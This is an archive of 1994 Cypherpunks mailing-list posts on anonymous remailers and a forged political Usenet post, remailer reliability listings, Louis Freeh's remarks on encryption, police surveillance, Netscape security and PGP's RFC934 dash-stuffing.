> discuss life and public issues in the province, said Larry Sherman,
> president of Internet Seminars of Woodbridge.
> A message can be removed from the board only by whoever posted it,

No, anyone with a moderately flexible newsreader and a little bit of knowledge about news control message syntax can cancel someone else's article.

Tying this in to the discussion about using a newsgroup as a message pool, notice that news articles are far easier to wipe out than mail messages. This is potentially a major vulnerability of any such system, given current news software.
Widespread unauthorized cancellations (other than for spam) are greatly frowned upon, though, so a concerted attack would probably set up a major clash of powers on the net.

[...]
> The source of the message was an account that provides a service
> that allows people anonymous access to the Internet, she said.

mail forwarding =/= net access

> Mr. Sherman said it is very easy to post a false message on a
> bulletin board and to make it appear that it came from a computer
> different from the one that sent it.

True, but that's a claim about forgery, not remailing; this is a worrisome confusion of terms reminiscent of the hacker/cracker problem.

> By going through a California bulletin board, "obviously someone
> has gone way out of their way to send that in," Mr. Sherman
> added.

One hopes that Internet Seminars pres. Sherman isn't responsible for the absurd implication I infer from this: sending mail via a geographically distant site requires going out of one's way. Is there some more sensible interpretation ? It seems obvious that someone posting an article purporting to emanate from the Canadian PM would try to transmit it with some level of indirection.

[...]
> Last month, the Tories played pranks at an NDP convention
> sending in a camera crew that shot pictures ridiculing Mr. Rae,
> including a doctored video sequence that seemed to give the Premier
> a stutter. The pictures were broadcast as dinner-time entertainment
> at a Conservative convention the same weekend.

Who's learning slimy politics from whom ?

- - -L. Futplex McCarthy; PGP key by finger or server
"We've got computers, we're tapping phone lines; I know that that ain't allowed" --Talking Heads

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service
-----END PGP SIGNATURE-----

From lmccarth at ducie.cs.umass.edu Mon Dec 12 01:50:09 1994
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Mon, 12 Dec 94 01:50:09 PST
Subject: News->Mail & CMU's Andrew Message System
Message-ID: <199412120955.EAA16263@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Todd Masco writes:
> I don't see a problem. Broadly put, news is broadcast e-mail. There are
> many sites which in fact do not distinguish between the two, the most
> notable of which is CMU's Andrew Message System: the admins of such
> systems believe the "experiment" to be an all-around success.

Is the AMS software (or some similar system) available as freeware or shareware somewhere ? I'm considering the possibilities for anonymized subscription to newsgroups through a mechanism like this. Come to think of it, many newsgroups are gatewayed to related mailing lists for readers on BBSes and such; I need to search a bit for the software used to do this.

I'm curious how such systems deal with cancellation messages; presumably they would simply have to drop them.
This would partially eliminate the threat of spam-of-cancels attacks I mentioned earlier.

- - -L. Futplex McCarthy; PGP key by finger or server
"We've got computers, we're tapping phone lines; I know that that ain't allowed" --Talking Heads

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service
-----END PGP SIGNATURE-----

From lmccarth at ducie.cs.umass.edu Mon Dec 12 02:00:28 1994
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Mon, 12 Dec 94 02:00:28 PST
Subject: Broadcasts - Bandwidth Problem ?
Message-ID: <199412121005.FAA16675@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Jonathan Rochkind writes:
> Many people seemed to think that a newsgroup for this sort of a thing was a
> waste of bandwidth. I don't really agree, and think that the bandwidth is
> necessary for a distributed method of making the remailer net more robust
> to remailers popping into and out of existence.

In case the bandwidth on {alt.anonymous, alt.anonymous.messages} started to bother news admins, we could actively encourage them to put the groups on very short expiration periods, i.e. articles might expire after only a day. Assuming people are using automated sniffers to collect their anonymous mail, this shouldn't present any obstacle to the use of the groups as message pools.
Keeping the ciphertext around in public for a shorter time sounds like a Good Thing (tm), anyway.

I agree that bandwidth seems essential to foiling traffic analysis.

- - -L. Futplex McCarthy; PGP key by finger or server
"We've got computers, we're tapping phone lines; I know that that ain't allowed" --Talking Heads

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service
-----END PGP SIGNATURE-----

From lmccarth at ducie.cs.umass.edu Mon Dec 12 02:13:21 1994
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Mon, 12 Dec 94 02:13:21 PST
Subject: Exact quotation from Freeh on banning unapproved crypto ?
Message-ID: <199412121018.FAA17062@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Can anyone point me to a source of verbatim quotations of Louis Freeh's now-legendary comments about the possibilities of banning unapproved cryptography ? All I have been able to find thus far are vague paraphrases. Thanks.

- - -L. Futplex McCarthy

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.
A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service -----END PGP SIGNATURE----- From m5 at vail.tivoli.com Mon Dec 12 05:25:26 1994 From: m5 at vail.tivoli.com (Mike McNally) Date: Mon, 12 Dec 94 05:25:26 PST Subject: Articles on RC5 and GOST in January 95 Dr Dobbs Journal In-Reply-To: Message-ID: <9412121325.AA02896@vail.tivoli.com> Ian Farquhar writes: > Around the mid 1980's a rather interesting device appeared. It was > essentially an automated scanner for high-density barcodes. A recent mini-article in "WiReD" mentions a barcode-like encoding mechanism being promoted by (I think) Xerox. It's apparently denser than barcode and it survives copying well. | GOOD TIME FOR MOVIE - GOING ||| Mike McNally | | TAKE TWA TO CAIRO. ||| Tivoli Systems, Austin, TX: | | (actual fortune cookie) ||| "Like A Little Bit of Semi-Heaven" | From raph at CS.Berkeley.EDU Mon Dec 12 06:50:03 1994 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Mon, 12 Dec 94 06:50:03 PST Subject: List of reliable remailers Message-ID: <199412121450.GAA25593@kiwi.CS.Berkeley.EDU> I operate a remailer pinging service which collects detailed information about remailer features and reliability. 
To use it, just finger remailer-list at kiwi.cs.berkeley.edu

There is also a Web version of the same information, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.30.tar.gz

For the PGP public keys of the remailers, as well as some help on how to use them, finger remailer.help.all at chaos.bsu.edu

This is the current info:

REMAILER LIST

This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu.

$remailer{"vox"} = " cpunk pgp. post";
$remailer{"avox"} = " cpunk pgp post";
$remailer{"extropia"} = " cpunk pgp special";
$remailer{"portal"} = " cpunk pgp hash";
$remailer{"alumni"} = " cpunk pgp hash";
$remailer{"bsu-cs"} = " cpunk hash ksub";
$remailer{"rebma"} = " cpunk pgp hash";
$remailer{"jpunix"} = " cpunk pgp hash latent cut post ek";
$remailer{"c2"} = " eric pgp hash";
$remailer{"soda"} = " eric post";
$remailer{"penet"} = " penet post";
$remailer{"ideath"} = " cpunk hash ksub";
$remailer{"usura"} = " cpunk pgp. hash latent cut post";
$remailer{"desert"} = " cpunk pgp. post";
$remailer{"nately"} = " cpunk pgp hash latent cut";
$remailer{"myriad"} = " cpunk pgp hash latent cut ek";
$remailer{"xs4all"} = " cpunk pgp hash latent cut post ek";
$remailer{"flame"} = " cpunk pgp hash latent cut post ek";
$remailer{"rahul"} = " cpunk";
$remailer{"mix"} = " cpunk hash latent cut ek";

catalyst at netcom.com is _not_ a remailer.

Last ping: Mon 12 Dec 94 6:00:01 PST

remailer email address                     history      latency  uptime
-----------------------------------------------------------------------
xs4all   remailer at xs4all.nl             ***+*-+*****     9:24  99.99%
usura    usura at xs4all.nl                ***-*-++****    10:38  99.99%
alumni   hal at alumni.caltech.edu         +*+**+**+***     7:33  99.99%
penet    anon at anon.penet.fi             ++**+*******    29:39  99.99%
c2       remail at c2.org                  +++-_--+++-+    58:05  99.99%
flame    tomaz at flame.sinet.org          +*++******+-    14:55  99.98%
nately   remailer at nately.ucsd.edu       ++++++++++++    32:43  99.98%
portal   hfinney at shell.portal.com       ************     4:17  99.97%
jpunix   remailer at jpunix.com            +*++***** +-    14:42  99.96%
myriad   remailer at myriad.pc.cc.cmu.edu  **+*********     5:32  99.94%
vox      remail at vox.xs4all.nl           ---------..- 14:16:12  99.99%
rahul    homer at rahul.net                ***********      5:06  99.88%
bsu-cs   nowhere at bsu-cs.bsu.edu         *+-***-**++     22:31  99.82%
mix      mixmaster at nately.ucsd.edu      -+-+-++**+++    32:50  99.80%
ideath   remailer at ideath.goldenbear.com ******-*++      29:24  99.82%
desert   remail at desert.xs4all.nl        -------.---  10:57:50  99.99%
extropia remail at extropia.wimsey.com     --+++---.-+   5:00:06  99.68%
rebma    remailer at rebma.mn.org          *-..-.-*---  10:34:53  99.71%
soda     remailer at csua.berkeley.edu     .-......_.   11:45:06  96.63%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

History key
    #  response in less than 5 minutes.
    *  response in less than 1 hour.
    +  response in less than 4 hours.
    -  response in less than 24 hours.
    .  response in more than 1 day.
    _  response came back too late (more than 2 days).

Options and features
    cpunk    A major class of remailers. Supports Request-Remailing-To: field.
    eric     A variant of the cpunk style. Uses Anon-Send-To: instead.
    penet    The third class of remailers (at least for right now). Uses X-Anon-To: in the header.
    pgp      Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID.
    oldpgp   Remailer does not like messages encoded with MIT PGP 2.6. Other versions of PGP, including 2.3a and 2.6ui, work fine.
    hash     Supports ## pasting, so anything can be put into the headers of outgoing messages.
    ksub     Remailer always kills subject header, even in non-pgp mode.
    nsub     Remailer always preserves subject header, even in pgp mode.
    latent   Supports Matt Ghio's Latent-Time: option.
    cut      Supports Matt Ghio's Cutmarks: option.
    post     Post to Usenet using Post-To: or Anon-Post-To: header.
    special  Accepts only pgp encrypted messages.
    ek       Encrypt responses in reply blocks using Encrypt-Key: header.

Comments and suggestions welcome!

Raph Levien

From droelke at spirit.aud.alcatel.com Mon Dec 12 07:12:22 1994
From: droelke at spirit.aud.alcatel.com (Daniel R. Oelke)
Date: Mon, 12 Dec 94 07:12:22 PST
Subject: Articles on RC5 and GOST in January 95 Dr Dobbs Journal
Message-ID: <9412121512.AA02548@spirit.aud.alcatel.com>

>
> Ian Farquhar writes:
> > Around the mid 1980's a rather interesting device appeared. It was
> > essentially an automated scanner for high-density barcodes.
>
> A recent mini-article in "WiReD" mentions a barcode-like encoding
> mechanism being promoted by (I think) Xerox. It's apparently denser
> than barcode and it survives copying well.

The Xerox technology is essentially a series of tiny slashes and backslashes. The slashes stand for a 1 and the backslashes a 0 - or vice-versa. This gives you a binary data stream that you can work with. From what I understand, without looking at them closely, the area with these slashes looks like a gray screen.

When I first read about this technology a couple of months ago, it was given as a way that sufficiently smart color copiers could restore original color to a black and white copy. Of course there are all kinds of other applications....
------------------------------------------------------------------ Dan Oelke Alcatel Network Systems droelke at aud.alcatel.com Richardson, TX http://spirit.aud.alcatel.com:8081/~droelke/ From bugs at ritz.mordor.com Mon Dec 12 07:39:11 1994 From: bugs at ritz.mordor.com (Mark Hittinger) Date: Mon, 12 Dec 94 07:39:11 PST Subject: real time surveillances Message-ID: <199412121538.KAA10670@ritz.mordor.com> Some thoughts on this: Will the people *believe* the electronic position data? Nope. When you are busted not only will you be frisked but you will also be bulk erased :-) (to get TC's DAT tape!) The technology to fabricate video evidence is there is it not? There was a relatively recent sad case of two officers that had a video camera installed in their patrol car. They had pulled over a speeding car. While obtaining the license the occupants of the car murdered the policemen and the *entire* scene was obtained on video tape. When the tape was later reviewed, searching for a clue as to what happened, the individual had to watch the officers slowly die - all captured on video. It is possible that they might have been saved had this been real-time video rather than taped. Consider the next level here folks? Will just having archived knowledge of where certain people are be adequate? Will there not ultimately be a call for real time monitoring of these officers? Will that be something that would be cool with them? Another great idea would be anonymous real-time monitoring of vital signs along with position data. Auto-911 if you will. We know somebody at this corner had a heart attack 5 minutes ago where is he? Cheers mark.h From perry at imsi.com Mon Dec 12 07:51:20 1994 From: perry at imsi.com (Perry E. 
Metzger) Date: Mon, 12 Dec 94 07:51:20 PST Subject: BofA+Netscape In-Reply-To: Message-ID: <9412121550.AA10442@snark.imsi.com> Marc Andreessen says: > I fully expect we'll be supporting other security standards and > approaches as they emerge, and we certainly welcome realistic suggestions > on what we should do, when, and how. I told you in Email, Mr. Andreessen, that new transport level security protocols are useless now that IPSP has come near to standardization and now that prototype implementations are nearly available. Many people at IETF in other groups expressed far less interest in proceeding with new security protocols now that there will be a network layer security protocol. However, you did not appear to be remotely interested. I suppose that you considered the comment I made "unrealistic". Personally, I consider to be unrealistic the notion that the same group of programmers who a year or two ago thought that the way to remove files on a Unix system was to use system(3) to call rm via the shell will be standardizing security -- after all, they couldn't produce a secure piece of software to begin with. My current presumption is that since the same programmers who produce Mosaic produced Netscape that, although pretty looking on the outside, it is just as bad on the inside: like a beautiful marble skyscraper that is held together on the inside with chewing gum, toothpicks and rusty baling wire. I have discouraged clients from using Netscape in the absence of source because there is no way to look for the security holes that are surely lurking within it; unfortunately, the product is just too pretty looking. By all means, of course, work on any security system you like. The burden will be on you to convince people to use it. Perry From perry at imsi.com Mon Dec 12 08:55:12 1994 From: perry at imsi.com (Perry E. 
Metzger) Date: Mon, 12 Dec 94 08:55:12 PST Subject: Crypto Declaration of Independance In-Reply-To: <199412120906.DAA09468@jpunix.com> Message-ID: <9412121654.AA10520@snark.imsi.com> Anonymous says: > I have started work on a Crypto Declaration of Independence, based on the > famous American work which represents Independence. Yup, just what we need -- more foaming at the mouth. Anyone interested in doing real work is encouraged to read the current internet drafts concerning the security multiparts extension to MIME, the security extensions to the DNS, or the work on security headers for IPv6 and IPSP (the equivalent of the v6 work for v4). .pm From doumakes at netcom.com Mon Dec 12 10:21:56 1994 From: doumakes at netcom.com (Don Doumakes) Date: Mon, 12 Dec 94 10:21:56 PST Subject: Real-time surveillance of the police Message-ID: <199412121820.KAA08206@netcom11.netcom.com> The technology of monitoring location is interesting, of course, but why on earth would the police, who will not consent to civilian review, ever go along with something orders of magnitude more extreme? ObCrypto/Privacy: I suspect there would be an immense amount of radio traffic involved in keeping track of a substantial group of people, say, over 1000. I don't doubt the ability of the device(s) to transmit the information, but the ability of the receivers to digest it all in real time. -- ______________________________________________________________________ Don Doumakes Finger doumakes at netcom.com for PGP public key Foxpro databases built to your specifications. Email me for details. From steven at echonyc.com Mon Dec 12 10:23:34 1994 From: steven at echonyc.com (Steven Levy) Date: Mon, 12 Dec 94 10:23:34 PST Subject: Exact quotation from Freeh on banning unapproved crypto ? In-Reply-To: <199412121018.FAA17062@bb.hks.net> Message-ID: I was the one who asked Freeh the question, after he gave a talk at the conference on Global Cryptography. 
I said that while the administration is currently saying that they are not interested in regulating cryptography domestically, what if in the future the wiretaps you get yield scrambled messages that you can't decipher. (Meaning, do you regulate then?) Freeh asked, "In terms of encryption being a voluntary standard?" "Yes," I said. "Oh yeah, definitely," he said. "If five years from now we solved the access problem, but what we're hearing is all encrypted, I'll probably, if I'm still here, be talking about that in a very different way; the objective is the same. The objective is for us to get those conversations whether they're by an alligator clip or ones and zeros. Wherever they are, whatever they are, I need them." On Mon, 12 Dec 1994, L. McCarthy wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > - -----BEGIN PGP SIGNED MESSAGE----- > > Can anyone point me to a source of verbatim quotations of Louis Freeh's now- > legendary comments about the possibilities of banning unapproved cryptography ? > All I have been able to find thus far are vague paraphrases. Thanks. > > - - -L. Futplex McCarthy > > - -----BEGIN PGP SIGNATURE----- > Version: 2.6.1 > > - -----END PGP SIGNATURE----- > - --- > [This message has been signed by an auto-signing service. A valid signature > means only that it has been received at the address corresponding to the > signature and forwarded.] 
> > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > Comment: Gratis auto-signing service > > -----END PGP SIGNATURE----- > From sandfort at crl.com Mon Dec 12 10:32:01 1994 From: sandfort at crl.com (Sandy Sandfort) Date: Mon, 12 Dec 94 10:32:01 PST Subject: BEAT COPS Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, Michael Crawford wrote: ... individual cops can rack up millions of dollars in legal settlement costs and still remain on the force. I heard ... that a small handful of cops in San Francisco had cost the City tens of millions, with individual cops repeatedly causing lawsuits, without getting fired. True, but that's without embarrassing videotapes. The clueless populace doesn't stay clueless for long when they've seen the police "blooper" tapes. Police unions won't have much clout compared to an enraged public. ... at least one cop wouldn't go for it - the cop we caught jacking off to a magazine of ill repute... Gives whole new meanings to "night stick," "the long arm of the law," "stop and frisk," "pat down," "pounding a beat" and going to the "policeman's ball." (Anyone else want to jump in on this one?) S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From jrochkin at cs.oberlin.edu Mon Dec 12 10:56:08 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Mon, 12 Dec 94 10:56:08 PST Subject: Misunderstanding of Remail Headers Message-ID: At 2:13 AM 12/12/94, L. McCarthy wrote: >Hal writes: >> There was also a misperception that my remailer was an official effort >> endorsed by Portal (again, despite the disclaimers). Note that it was >> they who were contacted, not me (yet). 
This might suggest that it will >> not be possible to cleanly separate the remailer operators and service >> providers when problems like this arise. Both may end up being hassled >> (time will tell whether I am). > >This is all too familiar to me. Although I still haven't heard the official >line on the shutdown of Underdog following the Scythe spam, at least some >people locally (including, crucially, my advisor) received the impression that >I had forged (and authored !) the offending news articles in spite of the >disclaimer headers. Maybe the remailers should put bogus "From:" lines in, to avoid this? Make it "From: nobody", or "From: Anonymous", or even something odd like "From: AnonUser!hfinney at shell.portal.com". Put in some other lines telling the actual address of the remailer, as well as a complaints-to: address. Maybe "Sender: hfinney at shell.portal.com", or "Remailer:hfinney at shell.portal.com". The "From:" line seems to be confusing people. The author of the article quoted from the Globe & Mail apparently didn't even understand the disclaimer. The article was worded in such a way to make it seem the disclaimer was saying that Bob Rae didn't really write the message, as opposed to saying that Hal Finney didn't really write the message! Something needs to be done so that even the most internet clueless will understand that the message _isn't_ from Finney or McCarthy or Joe Random RemailerOp, which apparently isn't clear to many people currently. From jrochkin at cs.oberlin.edu Mon Dec 12 11:02:04 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Mon, 12 Dec 94 11:02:04 PST Subject: extra dashes in PGP-related blocks? Message-ID: When people have been posting their public keys, or encrypted address blocks, to various lists I'm on, all of the "-----BEGIN whatever..." lines seem to have a "- " prepended to them. 
So, for instance, they look like:

- -----BEGIN PGP MESSAGE-----
Version: 2.6.2
[stuff]
- -----END PGP MESSAGE-----

I'm guessing if I really sent a block like that to a remailer, the remailer would hork because of the prepended "- "s. I know that sometimes people's public keys they've posted to a list look like that, and when I try to add them to PGP, it horks, and I've got to go into a text editor and remove the "- ", and then add it to my keyring.

Does anyone know what it is that's putting in these "- "s, why it's putting them in, and how to stop it?

From andrew_loewenstern at il.us.swissbank.com Mon Dec 12 11:31:54 1994
From: andrew_loewenstern at il.us.swissbank.com (Andrew Lowenstern)
Date: Mon, 12 Dec 94 11:31:54 PST
Subject: extra dashes in PGP-related blocks?
Message-ID: <9412121931.AA00608@ch1d157nwk>

> I'm guessing if I really sent a block like that to a remailer, the
> remailer would hork because of the prepended "- "s. I know that
> sometimes people's public keys they've posted to a list look like
> that, and when I try to add them to PGP, it horks, and I've got to
> go into a text editor and remove the "- ", and then add it to my
> keyring.

PGP does this... Not only does it complicate nested PGP signed messages, but if you pgp-sign an entire MIME message (i.e. by sending it to the autosigning service) instead of placing the signed doc inside the MIME boundaries, it can cause mail readers to not recognize the MIME boundaries and display the letter as normal ASCII-Mail.

andrew

From andrew at riskdev.ml.com Mon Dec 12 11:33:12 1994
From: andrew at riskdev.ml.com (Andrew Brown)
Date: Mon, 12 Dec 94 11:33:12 PST
Subject: extra dashes in PGP-related blocks?
In-Reply-To:
Message-ID: <9412121933.AA04137@nottingham.riskdev.ml.com>

>> From: Jonathan Rochkind
>
>When people have been posting their public keys, or encrypted address
>blocks, to various lists I'm on, all of the "-----BEGIN whatever..." lines
>seem to have a "- " prepended to them. So, for instance, they look like:
>
>- -----BEGIN PGP MESSAGE-----
>Version: 2.6.2
>[stuff]
>- -----END PGP MESSAGE-----
>
>I'm guessing if I really sent a block like that to a remailer, the remailer
>would hork because of the prepended "- "s. I know that sometimes people's
>public keys they've posted to a list look like that, and when I try to add
>them to PGP, it horks, and I've got to go into a text editor and remove the
>"- ", and then add it to my keyring.
>
>Does anyone know what it is that's putting in these "- "s, why it's putting
>them in, and how to stop it?

pgp is putting those extra "- " pieces in (guess you didn't read all your pgp docs :-), it does that so that it can tell the difference between pgp begin/end blocks and other stuff, kinda like sendmail "quoting" lines beginning with a dot with an extra dot. the difference here is that sendmail removes any leading dots before delivery and pgp doesn't after removing a signature. yeah, you do have to load it into an editor but mailing something to a remailer should not "hork" it. the pgp running on the remailer will just "- " the stuff and include it literally. follow?

-- --< "CYBERBOY" >-- andrew at ml.com (Andrew Brown) Phone: 1.212.449.0088 Fax: 1.212.449.8612

From sandfort at crl.com Mon Dec 12 11:35:27 1994
From: sandfort at crl.com (Sandy Sandfort)
Date: Mon, 12 Dec 94 11:35:27 PST
Subject: real time surveillances
Message-ID:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SANDY SANDFORT
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Mark Hittinger had several thoughts about real-time surveillance. He wrote:

    ... The technology to fabricate video evidence is there is it not?

Big problem with self-surveillance; not a problem with a properly set up system of police surveillance. The critical element is a trusted third-party agency to archive the tapes.
There was a relatively recent sad case of two officers that had a video camera installed in their patrol car.... the occupants of the car murdered the policemen and the *entire* scene was obtained on video tape.... It is possible that they might have been saved had this been real-time video rather than taped. Yes, and real-time video monitoring would be a good upgrade when the technology allows it (real-time location monitoring is possible now). In the meantime, *obvious* video recording would also help protect officers in that some perps would think twice before killing someone *on camera*. ... Another great idea would be anonymous real-time monitoring of vital signs along with position data. Auto-911 if you will. We know somebody at this corner had a heart attack 5 minutes ago where is he? The developers of the localizer technology I mentioned in my article have anticipated you. Their equipment can do real-time vital sign monitoring. There are some obvious benefits for wired cops plus some subtle drawbacks for bad cops. (I leave discovery of said drawbacks as an exercise for the student.) S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From cactus at seabsd.hks.net Mon Dec 12 11:42:28 1994 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Mon, 12 Dec 94 11:42:28 PST Subject: News->Mail & CMU's Andrew Message System Message-ID: <199412121947.OAA22152@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- L. McCarthy wrote: >Is the AMS software (or some similar system) available as freeware or >shareware somewhere ? I'm considering the possibilities for anonymized >subscription to newsgroups through a mechanism like this. AMS is pretty strongly tied to AFS (now known as part of DCE) and is geared towards sites with users in the thousands. It's probably not what you want, even if it were available (CMU is in the process of phasing it out, since their user base usage has exceeded the design limitations of AMS). 
>Come to think of it, >many newsgroups are gatewayed to related mailing lists for readers on BBSes >and such; I need to search a bit for the software used to do this. Take a look at newsgate, available somewhere on ftp.uu.net. All you have to do is set up a pseudo-site in your news server's newsfeeds file and send the messages through news2mail. >I'm curious how such systems deal with cancellation messages; presumably they >would simply have to drop them. This would partially eliminate the threat of >spam-of-cancels attacks I mentioned earlier. It totally depends upon the configuration of the gateway and the format of the message. If your gateway passes Control: headers, then cancels will be forwarded to the user and perhaps even be effective if they have another mail-to-news gateway up (that allows Control: headers). Even more so for cancels of the "Subject: cmsg cancel" format, since everything passes Subject: headers. - -- Todd Masco | It's difficult to be loud about keeping your enumerated cactus at hks.net | rights when you're busy exercising your unenumerated ones. cactus at bb.com | http://www.hks.net/~cactus/cactus.html - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service -----END PGP SIGNATURE----- From mclow at coyote.csusm.edu Mon Dec 12 12:05:27 1994 From: mclow at coyote.csusm.edu (Marshall Clow) Date: Mon, 12 Dec 94 12:05:27 PST Subject: Misunderstanding of Remail Headers Message-ID: >At 2:13 AM 12/12/94, L. McCarthy wrote: >>Hal writes: >>> There was also a misperception that my remailer was an official effort >>> endorsed by Portal (again, despite the disclaimers). Note that it was >>> they who were contacted, not me (yet). 
This might suggest that it will >>> not be possible to cleanly separate the remailer operators and service >>> providers when problems like this arise. Both may end up being hassled >>> (time will tell whether I am). >> [ stuff deleted ] >The "From:" line seems to be confusing people. The author of the article >quoted from the Globe & Mail apparently didn't even understand the >disclaimer. The article was worded in such a way to make it seem the >disclaimer was saying that Bob Rae didn't really write the message, as >opposed to saying that Hal Finney didn't really write the message! >Something needs to be done so that even the most internet clueless will >understand that the message _isn't_ from Finney or McCarthy or Joe Random >RemailerOp, which apparently isn't clear to many people currently. While I'm all for having clear disclaimers, the facts remain: 1) You can't force people to read. 2) Even if you could, you can't force people to understand. Improve the disclaimers, sure. But don't think that this problem is going to go away because of it. -- Marshall (who has just blown his lurker status) :-) Marshall Clow Aladdin Systems mclow at san_marcos.csusm.edu From jamesd at netcom.com Mon Dec 12 12:14:04 1994 From: jamesd at netcom.com (James A. Donald) Date: Mon, 12 Dec 94 12:14:04 PST Subject: Crypto Declaration of Independance In-Reply-To: <9412121654.AA10520@snark.imsi.com> Message-ID: <199412122012.MAA27440@netcom4.netcom.com> Perry E. Metzger writes > Yup, just what we need -- more foaming at the mouth. I seem to recall that on the extropians list you did your fair share of foaming at the mouth. While it is true that getting security working and standardized is right now a more urgent and more difficult task than foaming at the mouth, nonetheless more foaming at the mouth will be needed by and by. 
-- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From db at Tadpole.COM Mon Dec 12 12:18:40 1994 From: db at Tadpole.COM (Doug Barnes) Date: Mon, 12 Dec 94 12:18:40 PST Subject: Broadcasts - addressing In-Reply-To: <199412121005.FAA16675@bb.hks.net> Message-ID: <9412122018.AA07956@tadpole.tadpole.com> I have been contemplating how to mark broadcast messages as being 'for' someone. To foil traffic analysis, you don't want to include their nym or key-id; for the sake of your poor CPU, you want to avoid the need to attempt decryption on everything that passes through. My first thought on this is to standardize a way for marking messages with either the nym _or_ a one-time-address (a large random number). The sniffer would need to be loaded with lists of unused one-time-addresses, which could be given out in blocks to correspondents. The one-time-address method would obviously not work the first time you contacted a nym, but on further conversation it could significantly hamper traffic analysis and would also render the messages from X->Y unlinkable (if you were thinking of a "X's alias for Y is " approach.) This is just a first-order brainstorm, I'm curious what others have thought about this. Also... > In case the bandwidth on {alt.anonymous, alt.anonymous.messages} started to > bother news admins, we could actively encourage them to put the groups on > very short expiration periods, i.e. articles might expire after only a day. > Assuming people are using automated sniffers to collect their anonymous mail, > this shouldn't present any obstacle to the use of the groups as message pools. > Keeping the ciphertext around in public for a shorter time sounds like a > Good Thing (tm), anyway. 
> I agree that bandwidth seems essential to foiling traffic analysis. In order for there to be enough bandwidth to rival some of the really classic Usenet bandwidth hogs (e.g. alt.binaries.*), then there would likely be enough interest and bandwidth to come up with something that is less leveraged off of Usenet, or that mitigated the load. Remember, there are people sending sound and video around the net, not to mention the huge amount spent to move .GIFs from hither to yon. I think that you could make a case that experimenting with anonymous protocols is potentially a very worthwhile educational endeavor, possibly more so than some of the other common uses for the net, and that it is, by comparison, relatively low-bandwidth. I agree it can and should be expired quickly once the volume becomes significant. From strick at techwood.org Mon Dec 12 12:23:23 1994 From: strick at techwood.org (strick at techwood.org) Date: Mon, 12 Dec 94 12:23:23 PST Subject: (RFC934) Re: extra dashes in PGP-related blocks? In-Reply-To: Message-ID: <199412122021.MAA04027@gwarn.versant.com> THUS SPAKE jrochkin at cs.oberlin.edu (Jonathan Rochkind): # # Does anyone know what it is that's putting in these "- "s, why it's putting # them in, and how to stop it? They're part of RFC934 and they are the correct standard way to encapsulate messages inside messages, short of using MIME. Many mailers produce & handle these correctly. The extra "- " are due to "Character-Stuffing the Encapsulation Boundary". What you&we need is filters to extract encapsulations that unstuff nested encapsulations. Relevant excerpt from RFC934 follows. --strick -- -- -- Network Working Group Marshall T. Rose (Delaware) Request for Comments: 934 Einar A. Stefferud (NMA) January 1985 Proposed Standard for Message Encapsulation ... Message Encapsulation ... Definitions: a draft forwarding message consists of a header portion and a text portion. 
